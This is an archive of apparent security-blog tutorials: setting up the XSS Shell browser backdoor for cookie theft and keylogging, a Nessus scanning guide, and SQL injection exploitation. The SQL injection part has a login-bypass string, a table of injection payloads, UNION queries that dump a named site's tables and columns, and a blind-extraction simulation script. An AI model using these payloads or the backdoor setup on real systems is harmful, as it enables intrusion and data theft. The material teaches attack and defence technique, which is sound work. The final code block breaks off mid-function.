Author Archives: kamalb

Advanced Exploitation using XSS-SHELL

Before getting into XSS Shell, let us recollect a few basics of XSS (Cross Site Scripting). XSS is one of the most common vulnerabilities in web applications today. It is a technique through which an attacker tries to compromise a web application by getting a malicious script executed in the context of that application, thereby breaking its Same-Origin policy. The Same-Origin policy states that a script coming from a foreign site, i.e. one that does not belong to the same domain (document.domain), should not be processed in the context of the application.

Once an attacker finds XSS in a web application, he can perform different kinds of attacks:
– Stealing credentials
– Stealing session tokens
– Defacing the website
– Causing DoS
– Installing keyloggers, and many more.

Cross-Site Scripting exists in three different forms:
– Reflected
– Stored
– DOM Based

Reflected XSS:
This kind of vulnerability exists in applications that use dynamic pages to display content to the user. Typically such an application takes a message in a request parameter and renders it back to the user.

For Example, consider the URL: http://www.[sample].com/error.html?value=learn+hacking

This shows the message learn hacking in the application's response, which means the application extracts the message from the URL, processes it and displays it to the user. In other words, user-supplied data from the URL is inserted into the server's response. If there is no proper sanitization, the application is vulnerable to Reflected XSS.

The URL can be crafted as: http://www.[sample].com/error.html?value=<script>alert(1)</script>

When you click on the above URL it executes the script and pops up an alert box.
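The error.html?value= page described above, modelled as two request handlers (an added example, not code from the original post): the vulnerable version concatenates the parameter into the response, the hardened one escapes it, and a small check confirms which of the two reflects the probe intact.

```python
import html
from urllib.parse import parse_qs

# Added example (not from the original post): the article's error.html?value=
# page modelled as two request handlers. Only the query string is passed in,
# so this runs without a web server.


def value_param(query_string: str) -> str:
    """Return the 'value' parameter the way error.html would read it.

    parse_qs decodes form encoding, so 'learn+hacking' becomes 'learn hacking'
    and '%3Cscript%3E' becomes '<script>'.
    """
    return parse_qs(query_string).get("value", [""])[0]


def render_error_vulnerable(query_string: str) -> str:
    """Reflected XSS: the parameter is concatenated into the response verbatim."""
    return f"<p>Error: {value_param(query_string)}</p>"


def render_error_safe(query_string: str) -> str:
    """Hardened form: escape at the point of insertion into HTML.

    html.escape turns < > & " ' into entities, so the browser shows the
    submitted text instead of parsing it as markup.
    """
    return f"<p>Error: {html.escape(value_param(query_string))}</p>"


def reflects_unescaped(response_body: str, raw_value: str) -> bool:
    """Regression check: does the response echo the raw value with '<' intact?

    Only meaningful for a value that contains markup characters; a value with
    no such characters is reflected identically by both handlers.
    """
    return "<" in raw_value and raw_value in response_body


if __name__ == "__main__":
    probe = "value=%3Cscript%3Ealert(1)%3C/script%3E"  # the article's alert(1) test
    for handler in (render_error_vulnerable, render_error_safe):
        body = handler(probe)
        print(handler.__name__, "reflects unescaped:",
              reflects_unescaped(body, "<script>alert(1)</script>"))
```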

Stored XSS:
This type of vulnerability exists in applications that take input from a user, store it, and later display it to other users. For example, consider the Facebook application, which allows commenting on any picture or status update and then displays the comment to all other users. If the application doesn't sanitize the input properly, an attacker can write a script into the comment area, so that every user who visits or views that particular page or post is affected.

So Stored XSS consists of two steps. First, the attacker enters the malicious script into the application. Second, a user visits the crafted page and the script executes in the background, without the user's knowledge.

DOM Based XSS:
DOM stands for Document Object Model. This variant is quite different from the other two described above. In DOM Based XSS, when the user clicks on the crafted URL, the server's response does not contain the attacker's script. Instead, the browser executes the malicious script while processing the response. This is possible because the browser's Document Object Model exposes the URL used to load the current page: a script issued by the application may extract data from the URL and process it, and then update the content of the page dynamically based on what was supplied through the URL.

XSS Shell

XSS Shell is a powerful tool developed in ASP .NET which runs as an XSS backdoor between the attacker and the victim. With plain XSS, the attacker has only one shot at executing an attack on the victim: once the victim navigates away from the malicious page, the attacker's interaction with the victim ends. XSS Shell instead lets the attacker open an interactive channel with the victim and communicate by sending commands. Here, even if the victim navigates away from the vulnerable/malicious page, the attacker can continue the communication, as XSS Shell re-generates the page.

The interactive shell or communication channel that the attacker establishes with the victim is called the "XSS Tunnel". The XSS Tunnel is used for tunneling HTTP traffic between two machines through a channel opened by XSS. Technically it is built on AJAX, which can send requests and receive responses and has the ability to talk cross-domain.

Attack Process:
1. Setup XSS Shell Server.
2. Configure XSS Tunnel to use XSS Shell Server.
3. Inject malicious script into a vulnerable Website.
4. Launch XSS Tunnel and wait for victim.
5. Configure the browser or tool to use XSS Tunnel.
6. When victim visits the vulnerable page, start using XSS Tunnel.

How XSS Shell works:

[Figure: xss shell process 1]

As shown in the figure, the attacker first establishes a connection with the XSS Shell server and injects the malicious script into the web application using Stored or Reflected XSS. Once the victim visits the vulnerable application carrying the malicious script, a request is sent to the XSS Shell Server. On the basis of that request the server establishes a channel to interact with the victim.

[Figure: xss shell process 2]

Once a channel has been created between the victim and the XSS Shell Server, the attacker can control the communication through the XSS Shell Admin Interface. The XSS Shell Admin Interface is simply a GUI that provides a defined set of commands which the attacker can execute to perform certain actions.

On executing a command, the corresponding function or script is called at the XSS Shell Server and sent to the victim. The script is processed and executed in the victim's browser, which sends the results back to the XSS Shell Server. The server stores the results in the MS-Access database it normally uses for its data. The attacker can extract the results from the database and look at them whenever he wants.

Some of the commands that the XSS Shell Admin Interface provides are:
– Get Cookie
– Get Current Page
– Get Clipboard
– Get Key-logger data
– Crash browser

One more advantage of XSS Shell is that it is Open Source, and it is quite easy to implement new commands.

Requirements:
– An IIS server where you can host .asp files
– Microsoft Access database (.mdb)
– A website which is vulnerable to XSS
– A vulnerable site to perform the attack on

Setting up the environment:
– Download the XSSShell from:
– Configure IIS to host the site
– Installation
– Configure XSS Shell

Configuring IIS:
In order to configure IIS on Windows 7 or above, follow the steps given below:

1. Click on the Start Menu and go to Control Panel.
2. Click Programs and then click on Turn Windows features on or off.
3. A new Windows Features dialog box appears. Expand Internet Information Services.
4. Select the default features that have to be installed with IIS.
5. You can expand the additional categories and install any additional features if required.
6. It is recommended to install the additional features if you want to use IIS for evaluation purposes.

Now IIS has been configured on the machine and can be accessed at http://localhost/

[Figure: IIS 7 default page]

XSS Shell uses ASP .NET and an MS-Access database, so make sure that you have the .NET Framework and MS-Access installed on your machine.

Configuring XSS Shell Admin Interface:
– After downloading the file, extract it; you will see two folders, XSSshell and XSSTunnel.
XSSshell is the admin interface, and you need to configure it on your machine. Copy the XSSshell folder to your web server.

[Figure: xss shell folder]

– You can see a sub-folder named db in the XSSShell folder, as shown in the above image. Move it to a secure place, because XSSshell stores all its data in that db, whether it is the victim's session cookies or any other data captured from the victim.
– After moving the db folder to a secure place, configure its path in the db.asp file under the XSSshell/admin folder, so that the interface knows where the db is and can interact with it.

[Figure: xssshell source 1]

– Edit the path so that it points to the location where the db folder is present on your machine.

[Figure: xssshell source 2]

– The above image shows the default password used to access the shell.mdb file. You can change it to whatever you want.
– Now you can access the admin interface using the localhost URL or the domain name that you have configured, e.g. http://localhost/xssshell (or the equivalent under your domain name).
– By default it uses port 80, but if you changed the port number while configuring the domain, you need to include the port number in the URL.

Configuring XSS Shell:
– Open xssshell.asp from the XSSshell folder.
– Configure the server path, i.e. the location where the XSSshell folder is placed.

[Figure: xssshell source 3]

– The above figure shows the configuration of the server path in the xssshell.asp file. Edit the SERVER parameter so that it points to the location of the XSSshell folder on your machine.
– Now access your admin interface from the browser. It contains three sections.

[Figure: xss shell admin interface]

As mentioned earlier, XSSshell has pre-defined commands which make it easy for the attacker to perform attacks on the victim. The Commands section contains all the commands supported by the shell. As it is open source, you can edit it and add your own functionality.

The Victims section shows the list of victims.

The Logs section shows the list of actions performed on the victims.

XSS Tunnel:

XSS Tunnel is a proxy-like tool which runs on the attacker's machine and captures traffic through the XSS channel on the XSSshell server. To do this, XSS Tunnel needs to know where the XSSshell server is running. The XSSshell information (i.e. where it is running) is configured in XSS Tunnel from the Options tab: enter the server address and password, then click on Test Server to make sure it is working. You get a success message if the configuration is correct.

[Figure: xss tunnel - connection success]

Once done with the configuration, click on Start XSS Tunnel at the top of the window. You can then see all the actions performed by the victim from the XSS Tunnel's Dashboard. The image below shows all the pages visited by the victim and the actions performed.

[Figure: xss tunnel - traffic capture]


XSSshell is a tool which opens a gateway for the attacker through which he can perform various attacks on the victim without losing the connection once it has been established.



Posted by on January 29, 2014 in web application hacking



NESSUS Vulnerability Scanner – Basics

If you are looking for a vulnerability scanner, you might have come across several expensive commercial products and tools with a wide range of features and benefits. If a full-featured free vulnerability scanner is on your mind, then it's time to get to know Nessus. This article covers installation, configuring and selecting policies, starting a scan and analyzing the reports using the Nessus Vulnerability Scanner.

Nessus was created by Renaud Deraison in 1998 to provide the Internet community with a free remote security scanner. It is a full-fledged vulnerability scanner which allows you to detect potential vulnerabilities in your systems. Nessus is the world's most popular vulnerability scanning tool and is supported by most research teams around the world.

The tool is free of cost for non-commercial, non-enterprise use. Nessus uses a web interface to set up scans, run them and view reports. It has one of the largest vulnerability knowledge bases, and this KB is what makes the tool so popular.

Nessus supports a wide range of operating systems, including Windows XP/7, Linux, Mac OS X, Sun Solaris, etc.

Key Features:

  • Identifies vulnerabilities that allow a remote attacker to access sensitive information on the system.
  • Checks whether the systems in the network have the latest software patches.
  • Tries default and common passwords on system accounts.
  • Configuration audits.
  • Vulnerability analysis.
  • Mobile device audits.
  • Customized reporting.

Installation & Configuration:

  1. You can download the Nessus Home feed (free) or Professional feed from the Nessus website.
  2. Once you have downloaded the Nessus Home tool, you need to register to generate an activation key. The activation key will be sent to your email id.
  3. Install the tool (the installation can be quite confusing, and the installation guide comes in handy).
  4. Open Nessus in the browser; normally it runs on port 8834:
    http://localhost:8834/WelcomeToNessus-Install/welcome and follow the on-screen instructions.
  5. Create an account with Nessus.
  6. Enter the activation code you obtained by registering with the Nessus website. You can also configure a proxy if needed by giving the proxy hostname, proxy username and password.
  7. The scanner then gets registered and creates the user account.
  8. Then it downloads the necessary plugins (this takes some time).
  9. Once the plugins are downloaded it automatically redirects you to a login screen. Provide the username and password that you created earlier to log in.

Running the Tool:

Nessus gives you many choices when it comes to running the actual vulnerability scan. You can scan individual computers, ranges of IP addresses or complete subnets. There are over 1200 vulnerability plugins in Nessus, with which you can specify individual vulnerabilities or sets of vulnerabilities to test for. In contrast to other tools, Nessus does not assume that specific services are running on their common ports; instead it attempts to exploit the vulnerabilities it finds.

The foundations for discovering vulnerabilities in a network are:

  • Knowing which systems exist
  • Knowing which ports are open and which listening services are available on those ports
  • Determining which operating system is running on the remote machine

Once you log into Nessus using the web interface, you will see different options such as:

  • Policies – for configuring the options required for a scan
  • Scans – for adding different scans
  • Reports – for analyzing the results

The basic workflow of the Nessus tool is: log in, create or configure a policy, run the scan and analyze the results.


Policies are simply the sets of vulnerability tests that you can perform on the target machine. By default Nessus comes with 4 policies.

[Figure: Nessus policies]

The above figure shows the default policies that come with the Nessus tool.

External Network Scan:

This policy is pre-configured so that Nessus scans externally facing hosts that provide services to the outside. It scans all 65,535 ports of the target machine. It is also configured with the plugins required for web application vulnerability tests like XSS.

Internal Network Scan:

This policy is configured to scan large internal networks with many hosts, services and embedded systems such as printers. It scans only standard ports instead of all 65,535 ports.

Web App Tests:

Nessus uses this policy to detect different types of vulnerabilities in web applications. It has the capability to spider the entire web site and discover the content and links in the application. Once the spidering has completed, Nessus starts to discover the vulnerabilities that exist in the application.

Prepare for PCI DSS audits:

This policy has the PCI DSS (Payment Card Industry Data Security Standard) checks enabled. Nessus compares the results with the standard and produces a report for the scan. The scan does not guarantee a secure infrastructure. Organizations preparing for PCI DSS can use this policy to prepare their network and systems.

Apart from these pre-configured policies, you can also upload a policy by clicking on "Upload", or configure your own policy as per your scan requirements by clicking on "New Policy".

Configuring the Policy:

  • Click on the policies tab on the top of the screen
  • Click on the New Policy button to create a new policy

Under the General settings tab, select the "setting type" based on the scan requirement, such as Port Scanning, Performance, etc. Based on the type, Nessus prompts for different options that have to be filled in. For example, 'Port Scanning' has the following options:

[Figure: Nessus Port scanning options]

The above figure shows the configuration options for Port Scanning.

Enter the port scan range. By default Nessus scans all the TCP ports listed in the /etc/services file. You can limit the ports by specifying them manually (like 20-30). Different scanners are available, such as the Nessus SNMP scanner, SSH scanner, ping remote host, TCP scanner, SYN scanner, etc. Enable them by selecting the check box as per the scan requirement.

  • Enter the credentials for the scan to use. You can use a single set of credentials or multiple sets if you have them. You can also run the scan without entering any credentials.
  • The Plugins tab lists a number of plugins. By default Nessus has all the plugins enabled. You can enable or disable all plugins at once, or enable a few from a plugin family as per the scan you'd like to perform. You can also disable unwanted plugins within a plugin family by clicking on the particular plugin.

[Figure: Nessus sub plugins]

The above figure shows the sub-plugins of the Backdoors plugin family.

In the above figure the green entry is the parent plugin and the blue entries are the sub-plugins, i.e. the plugins under the Backdoors family. You can enable or disable them by simply clicking on the Enabled button.

  • Under Preferences, you are provided with a drop-down box to select different types of plugins. Select the plugin based on the scan requirement and specify the settings as per that plugin's requirements. Click Finish once completed. For example: configuring the database settings.

[Figure: Nessus database settings plugin]

The above figure shows the configuration of the Database settings plugin.


Once you are done configuring the policies as per your scan requirements, you need to configure the scan details properly. You can do this under the Scans tab.

Under the Scans tab, you can create a new scan by clicking New Scan at the top right. A pop-up then appears where you need to enter details such as Scan Name, Scan Type, Scan Policy and Target.

  • Scan Name: The name that you want to give to the scan.
  • Scan Type: You have the option to run the scan instantly by selecting RUN NOW, or you can make a template which you can launch later when you want to run it. All templates are kept under the TEMPLATES tab beside the SCANS tab.
  • Scan Policy: Select the policy that you configured previously in the Policies section.
  • Select Target: Enter the target machine(s) you are planning to test. Depending on the targets, Nessus takes a varying amount of time to scan them.


Once the scanning process has completed successfully, the results can be analyzed from the RESULTS menu.

  • Once the scan has completed, you can see the name of the scan under the Results section. Click on the name to see the report.
  • Hosts: Lists all the target systems that you have scanned.
  • Vulnerabilities: Displays all the vulnerabilities found on the target machines that were tested.
  • Export Results: You can export the results into different formats like HTML, PDF, etc. You can also select an individual section or the complete result to export based on your requirements.

Let us try out an example now.

I have configured a policy named Basic Scan. There are many options while configuring or building the policy, such as port scanners, performance of the tool, Advanced, etc.

[Figure: Nessus port scanning settings for basic scan]

The above figure shows configuration settings of Port Scanning for the policy Basic Scan.

You don't need credentials now, so skip the Credentials tab and move to the Plugins tab. You need to configure the specific plugins as per the scan that you want to perform on the remote machine.

[Figure: Nessus plugins for basic scan]

The above figure shows the plugins that I have enabled for the policy Basic Scan. I have enabled a few plugins for a Windows machine scan.

[Figure: Nessus scan configuration]

The above figure shows the configuration of the Scan.

I have configured the scan to run instantly with the policy that I created earlier, and the scan target specifies the IP address I want to scan.

Once all the details have been entered, click on Create Scan. The scan then shows as running, as in the figure below.

[Figure: Nessus running scan]

Once the scanning has completed you can see the results in the Results tab. The figure below shows this.

[Figure: Nessus results]

Double clicking on the title displays the scan results.

[Figure: Nessus scan result]

The above figure shows the Hosts details. It includes all the targets that you scanned during the test. Double-clicking on a host address displays the vulnerabilities Nessus identified during the test. You can also click on the Vulnerabilities tab to check the vulnerabilities.

[Figure: Nessus vulnerabilities menu]

The above figure shows the vulnerabilities that Nessus found during its scan. Based on the risk, Nessus marks each as high, medium, info, etc. Clicking on a vulnerability gives you a brief description of it.

For example, let us look at the Netstat portscanner, which displays the following information:

[Figure: Nessus port scan result]

The above figure shows the ports open on the target machine.

In the same manner you can analyze the complete details by clicking on the vulnerabilities. Nessus also suggests solutions or remedies for the vulnerabilities, with a few references.


Nessus is a tool which automates the process of scanning networks and web applications for vulnerabilities, and also suggests solutions for the vulnerabilities identified during the scan.


Posted by on February 27, 2013 in web application hacking



SQL Injection exploitation and dumping the database

SQL Injection:

SQL Injection is a web-based attack used by attackers to steal sensitive information from organizations through their web applications. It is one of the most common application-layer attacks and has been in use for a long time. The attack takes advantage of improper coding of web applications, which allows an attacker to exploit the vulnerability by injecting SQL commands through the web application. The underlying fact that allows SQL Injection is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, consider a web application that implements a form-based login mechanism, stores the user credentials in a database, and performs a simple SQL query to validate each login attempt. Here is a typical example:

select * from users where username='admin' and password='admin123';

If the attacker knows that the username of the application administrator is admin, then he can log into the application as admin by entering the username as admin'-- and without supplying any password. The query in the back-end then looks like:

Select * from users where username='admin'--' and password='xxx';

Note that the comment sequence (--) causes the rest of the query to be ignored, so the query executed is equivalent to:

Select * from users where username='admin';

Hence the password check is bypassed and the attacker is logged into the app as admin.
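The login query above, built both ways against an in-memory SQLite database (an added example, not the post's own code; the users table and its admin/admin123 row are constructed here): string concatenation lets admin'-- bypass the password check, while a parameterised query does not, and a lone quote produces exactly the syntax error described later in the post.

```python
import sqlite3

# Added example (not from the original post): the article's login query built
# two ways against an in-memory SQLite database. The users table and its single
# row (admin / admin123, the article's example credentials) are constructed here.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.execute("insert into users values ('admin', 'admin123')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Builds the query by string concatenation, exactly as the article shows.

    With username admin'-- the comment sequence swallows the rest of the
    statement, so the password check disappears. A lone quote instead leaves
    an unterminated string, which the engine rejects with a syntax error.
    """
    query = (f"select * from users where username='{username}' "
             f"and password='{password}';")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: values travel separately from the SQL text, so
    quotes and comment sequences in the input are just data. This, not
    filtering of quote characters, is the fix."""
    query = "select * from users where username=? and password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


def probe_raises_syntax_error(conn: sqlite3.Connection, username: str) -> bool:
    """Mirrors the single-quote test: True if the concatenated query is broken."""
    try:
        login_vulnerable(conn, username, "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, admin'-- :", login_vulnerable(db, "admin'--", "wrong"))
    print("safe,       admin'-- :", login_safe(db, "admin'--", "wrong"))
    print("vulnerable, admin'   :", probe_raises_syntax_error(db, "admin'"))
```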

Different types of SQL Injections:

SQL Injection can be classified into 3 types based on the way it is exploited: In-band, Out-band and Inferred.

1. In-band:

This is also called Error-based or Union-based SQL Injection, or first-order Injection. The application is said to be vulnerable to In-band injection when the communication between the attacker and the application happens through a single channel, i.e. the attacker uses the same channel to enter the malicious string and to retrieve the data from the database. This is a straightforward technique: the application directly displays the retrieved data on its web pages.

Confirming the Vulnerability:

The URL below is an In-band SQLi vulnerable practice site which I set up in my VM.

Accessing the URL displays the home page, as shown in the image below.

[Figure: Sqlinjection demo]

Now let us try to confirm the vulnerability by simply adding a single quote at the end of the URL:'

The above URL produces an error on the web page saying "Error in your SQL syntax". This is because of the extra single quote (') that we entered through the URL into the query running in the background. So from the error we can understand that the URL is vulnerable to In-band SQLi. The image below shows the error that occurred due to the concatenated special character (').

[Figure: Sqlinjection error]

If the single quote (') is blocked, then we can try using "or 1=1 --" or "and 1=1 --" at the end of the URL: or 1=1 -- (or) and 1=1 --

The above URL shows the same page that was displayed while accessing the original URL:

This is because the condition that we entered at the end of the URL is always true.

Now try accessing it with the string "or 1=0--" or "and 1=0--", so that the URL looks like: or 1=0-- (or) and 1=0--

Now we are not able to access the page, because the condition "1=0" is always false. The image below shows the page when accessed with the false condition.

[Figure: Sqlinjection confirmation]

Thus we can confirm that the URL is vulnerable to SQLi.

The strings listed in the table below can be used to confirm SQL Injection:

or 1=1 | 'or 1=1 | "or 1=1 | or 1=1-- | 'or 1=1-- | "or 1=1--
or 1=1# | 'or 1=1# | "or 1=1# | or 1=1/* | 'or 1=1/* | "or 1=1/*
or 1=1;%00 | 'or 1=1;%00 | "or 1=1;%00 | 'or' | 'or | 'or'--
'or-- | or a=a | 'or a=a | "or a=a | or a=a-- | 'or a=a --
"or a=a-- | or 'a'='a' | 'or 'a'='a' | "or 'a'='a' | ')or('a'='a'

You can try all the combinations for the string "or a=a" that we tried for "or 1=1", i.e. with #, --, /* etc.


Moving further, we can extract or dump the complete database by using the UNION and SELECT commands.


We can find out the DBMS type (MS-SQL, MySQL, Oracle) by using functions unique to each database. For example, to find out the database user, each of the databases above has different syntax:

MS-SQL: user_name()
MySQL: user()
Oracle: select user from dual;

So let's try to find the DBMS of our SQLi vulnerable site. As a first trial I enter "user_name()" in the place where we had "2". union select 1,user_name(),3,4,5,6,7

The above URL gives an error saying "Function user_name doesn't exist", which means the DBMS isn't MS-SQL.

[Figure: Find database in Sql injection]

The above image shows that the DBMS isn't MS-SQL. Now let's try with "user()": union select 1,user(),3,4,5,6,7

The above URL displays the user name of the DBMS, so we can confirm that the DBMS is MySQL.

[Figure: Sqli - fetch database username]

The above image shows the database user name, which proves that the DBMS is MySQL.

So we can use any MySQL function in the place of 2, 3, 5 or 7 and dump the database onto the web page.


Let us try to find out the number of columns in the table using UNION. The URL looks like: union select NULL

This displays an error on the page saying "Select statement having different number of columns", so we now know that there is more than one column in the table.

[Figure: finding number of columns using sql injection]

The image shows the error message that occurred when accessing the web site using the above URL (using select NULL). So try adding one more NULL: union select NULL, NULL

If we still receive the same error, then keep adding NULLs to the query until we find the number of columns in the table: union select NULL, NULL, NULL, NULL, NULL, NULL, NULL

The above string gives the same page as the initial URL, since the number of columns in the table is seven.

[Figure: finding columns using sql injection by using order by]

The figure shows the page when accessed with the above URL (using seven NULLs).

We can also use ORDER BY to find out the number of columns in the table: order by 7--

So we can understand that there are seven columns in the table.

Now here is the trick: where will we be able to see the data extracted from the database?

Just add a negative sign before the id value; then the data appears on the web page straight away. union select 1,2,3,4,5,6,7

(Note: the negative sign (-) before 22)

Then the application displays some of the numbers on the web page. The above URL displays 2, 3, 5 and 7 on the web page.

[Figure: display content on web page using sql injection]

The figure shows the numbers displayed on the web page.

Finding the version and getting the databases: union select 1,@@version,database(),4,5,6,7

[Figure: finding version of database using sql injection]

The figure displays the database version "5.0" and the database "nilakantatrust".

Extracting Tables from database:

Now let us try extracting all the tables from the database "nilakantatrust": union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--

[Figure: extract tables using sql injection]

The figure shows all the tables dumped from the database "nilakantatrust".

information_schema holds the meta-data, i.e. information about all the tables and columns of the database.

Extracting columns from the tables: union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database()--

[Figure: extracting columns using sql injection]

The figure displays all the columns of the tables in the database "nilakantatrust". We can look at all the columns and then dump the interesting ones, like passwords, SSNs, credit card numbers etc.

2. Out-Band:

This kind of attack uses two different channels for communication between the attacker and the application. Modern DBMSs are very powerful, and their features go beyond simply returning data to users: they can be instructed to send an e-mail, and they can interact with the file system. All of these capabilities are very helpful to an attacker. The attacker establishes a direct connection to the database through one channel to insert the data or the malicious string into the database, and the DBMS responds through a new channel, such as e-mail, or by executing commands using xp_cmdshell etc.

3. Inferred:

This is also known as Blind SQL Injection. Here the server doesn't respond with any syntax error or other notification. It is very similar to normal SQL Injection, but when attacked the server doesn't send any data back to the attacker. The attacker needs to retrieve the data by asking true-or-false questions through SQL commands.

The attacker has to drive his commands by observing the responses of the application. This makes exploiting a SQL Injection more difficult, but not impossible.

Now let’s have some practice:  and 1=1 --

The above URL gives the same data as the original site. and 1=0 --

The above URL shows an error on the web page, as I explained previously (in the "In-band" type).


To find out the DBMS used by the application we need to make use of the different pre-defined functions available in the different databases.

For example, to find out the user name of the database, the following syntax is used by the different DBMSs:

  • MS-SQL: user_name()
  • Mysql: user()
  • Oracle: select user from dual

You can know the difference from the cheat-sheet available at

So, let us find out the DBMS using the above functions 😉

Accessing the URL below gives you a white page.

[Figure: blind sql injection]

Observe the white page in the figure, which is different from the page for the URL:

which we saw previously. By observing this difference we can determine the DBMS type of the application.

Let us check whether the application is using MS-SQL:

In the above URL I am trying to add 1 to the id '21' based on a condition. When we access the URL with ID=21 we get the page shown in Figure (m), and when we access the URL with ID=22 we get the home page shown in Figure (a).

In the URL, %2b stands for '+' and %20 for ' ' (space). This is called URL encoding. When a particular symbol is filtered we can pass it by encoding it using one of the different encoding techniques available.

The condition in the query is framed using a "case" statement along with "user_name" (a pre-defined function in MS-SQL that returns the DB user name). If the function user_name() exists then the condition returns '1', which makes the ID=22; otherwise it returns '0' and the id remains '21'.

[Figure: finding database using blind sql injection]

The figure shows the page, which confirms that the DBMS isn't MS-SQL. So now let us check for MySQL:

The above URL shows the page with ID=22, which confirms that the DBMS is MySQL.

Finding the version:

To find the database version we can use the 'substring' function in MySQL. Observe the below URL,1,1)=5--

If the database version starts with '5', the substring function returns '5' (we are extracting only one character) and the comparison with '5' is true. If we then see the home page, we can confirm that the database is some 5.x.x version.

If the URL doesn't bring up the home page, then we can try changing the comparison value to 4, 3, etc.

To find the exact version of the database we need to compare the second character of the version as well. For example:


So, by observing the responses of the application, we can extract the complete version of the database.

Finding the User Name of the database:

We can find out the user name of the database by using both the 'case' statement and the 'substring' function.,1,1)='a')%20then%200%20else%201%20end)--

Based on the responses of the application, keep changing the character compared in the substr() function.
Once we get the first letter of the user name, move on to find the second letter.

For example:

substr(user(),3,1)='b' ...

In this fashion, to find out a single character of the user name we may have to send more than 200 requests to the server, one for each possible ASCII character. This technique can be optimized so that a single character is extracted from the database within 8 requests.
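To make the request counts concrete, here is an added example that is not part of the original post: a local simulation of the boolean oracle described above. An in-memory SQLite table stands in for the site's pages (ids 21 and 22, as in the figures), and SQLite's substr() and sqlite_version() play the roles of MySQL's substring() and version(); the endpoint, table and page names are all constructed for the demo. The linear scan sends one request per candidate character, while the bisection over the 0..255 byte range needs exactly 8.

```python
import sqlite3

# Constructed stand-in for the vulnerable site: an in-memory SQLite table
# with the two ids used in the post (21 = the "Figure (m)" page, 22 = the
# home page). The post's target was MySQL; SQLite's substr() and
# sqlite_version() replace MySQL's substring() and version() here
# (assumption, so that the demo runs offline).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)")
conn.executemany("INSERT INTO pages VALUES (?, ?)",
                 [(21, "figure (m) page"), (22, "home page")])

request_count = 0  # every call to vulnerable_page() counts as one HTTP request


def vulnerable_page(id_param: str) -> str:
    """The vulnerable endpoint: the id parameter is pasted into the SQL text,
    so an injected expression is evaluated by the database."""
    global request_count
    request_count += 1
    sql = f"SELECT body FROM pages WHERE id={id_param}"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "error page"
    return row[0] if row else "white page"


def oracle(condition: str) -> bool:
    """The post's boolean oracle: id=21+(case when <cond> then 1 else 0 end)
    serves the home page (id 22) exactly when the condition is true."""
    page = vulnerable_page(f"21+(CASE WHEN ({condition}) THEN 1 ELSE 0 END)")
    return page == "home page"


def char_code_expr(expr: str, pos: int) -> str:
    # Code point of the pos-th character of expr (1-based), like the post's
    # substr(user(),3,1) probes. unicode('') is NULL in SQLite, so a position
    # past the end of the string never satisfies any comparison.
    return f"unicode(substr({expr},{pos},1))"


def extract_char_linear(expr: str, pos: int) -> str:
    """The naive approach the post describes: one request per candidate
    character (printable ASCII only here, 95 candidates)."""
    for code in range(32, 127):
        if oracle(f"{char_code_expr(expr, pos)}={code}"):
            return chr(code)
    return "\0"


def extract_char_bisect(expr: str, pos: int) -> str:
    """Binary search over the byte range 0..255: exactly 8 requests per
    character, the optimisation the post mentions."""
    lo, hi = 0, 256  # invariant: lo <= code < hi
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(f"{char_code_expr(expr, pos)}>={mid}"):
            lo = mid
        else:
            hi = mid
    return chr(lo)


def extract_string(expr: str, max_len: int = 40) -> str:
    """Read expr character by character until the oracle reports the end
    (code 0, i.e. substr() returned '')."""
    chars = []
    for pos in range(1, max_len + 1):
        ch = extract_char_bisect(expr, pos)
        if ch == "\0":
            break
        chars.append(ch)
    return "".join(chars)


def requests_used(fn, *args):
    """Run fn and return (result, number of simulated requests it needed)."""
    before = request_count
    result = fn(*args)
    return result, request_count - before


def true_version() -> str:
    """Ground truth read directly (not blind), to check the extraction against."""
    return conn.execute("SELECT sqlite_version()").fetchone()[0]


if __name__ == "__main__":
    print("linear :", requests_used(extract_char_linear, "sqlite_version()", 1))
    print("bisect :", requests_used(extract_char_bisect, "sqlite_version()", 1))
    print("blind  :", extract_string("sqlite_version()"), "truth:", true_version())
```

The only thing the oracle ever sees is "home page or not", which is why the technique works against an application that leaks no data in its error messages; the same differential is what makes the request pattern (hundreds of near-identical requests differing only in a comparison value) easy to spot in access logs.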


SQL injection is a powerful attack technique which can be used to dump the complete database of the application.

I have written this article for infosec institute. Take a look at the web application security course offered by infosecinstitute.



Posted by on January 7, 2013 in web application hacking


Exploit SQL Injection through SQLMap Burp Plugin

SQL Injection:

SQL Injection (SQLi) is a web-based attack used by hackers to steal sensitive information from organizations through their web applications. It is one of the most common application-layer attacks used today. The attack takes advantage of improper coding of web applications, which allows hackers to exploit the vulnerability by injecting SQL commands into the web application. The underlying fact that allows for SQLi is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, let us consider a web application that implements a form-based login mechanism, stores the user credentials in a database and performs a simple SQL query to validate each login attempt. Here is a typical example:

select * from users where username='admin' and password='admin123';

If the attacker knows that the username of the application administrator is admin, then he can log into the app as admin by entering the username as admin'-- without supplying any password. The query in the back-end looks like:

Select * from users where username='admin'--' and password='xxx';

Note that the comment sequence (--) causes the rest of the query to be ignored, so the query executed is equivalent to:

Select * from users where username='admin';

Hence the password check is bypassed and the attacker is logged into the app as admin. SQL injection can be tested in two ways: manual pen-testing and automation.
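The bypass above, run against a constructed in-memory SQLite table, as an added example that is not part of the original post. build_query() assembles the post's query by string concatenation exactly as the vulnerable application would; login_parameterized() is the fix, using bound parameters so the quote and the comment sequence in the username are treated as data rather than SQL syntax. The table, account and password are constructed for the demo (a real application would store a password hash).

```python
import sqlite3

# Constructed demo: one users table holding the post's admin account. The
# password is kept in clear text only to mirror the post's example query;
# this is not anyone's real schema.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'admin123')")


def build_query(username: str, password: str) -> str:
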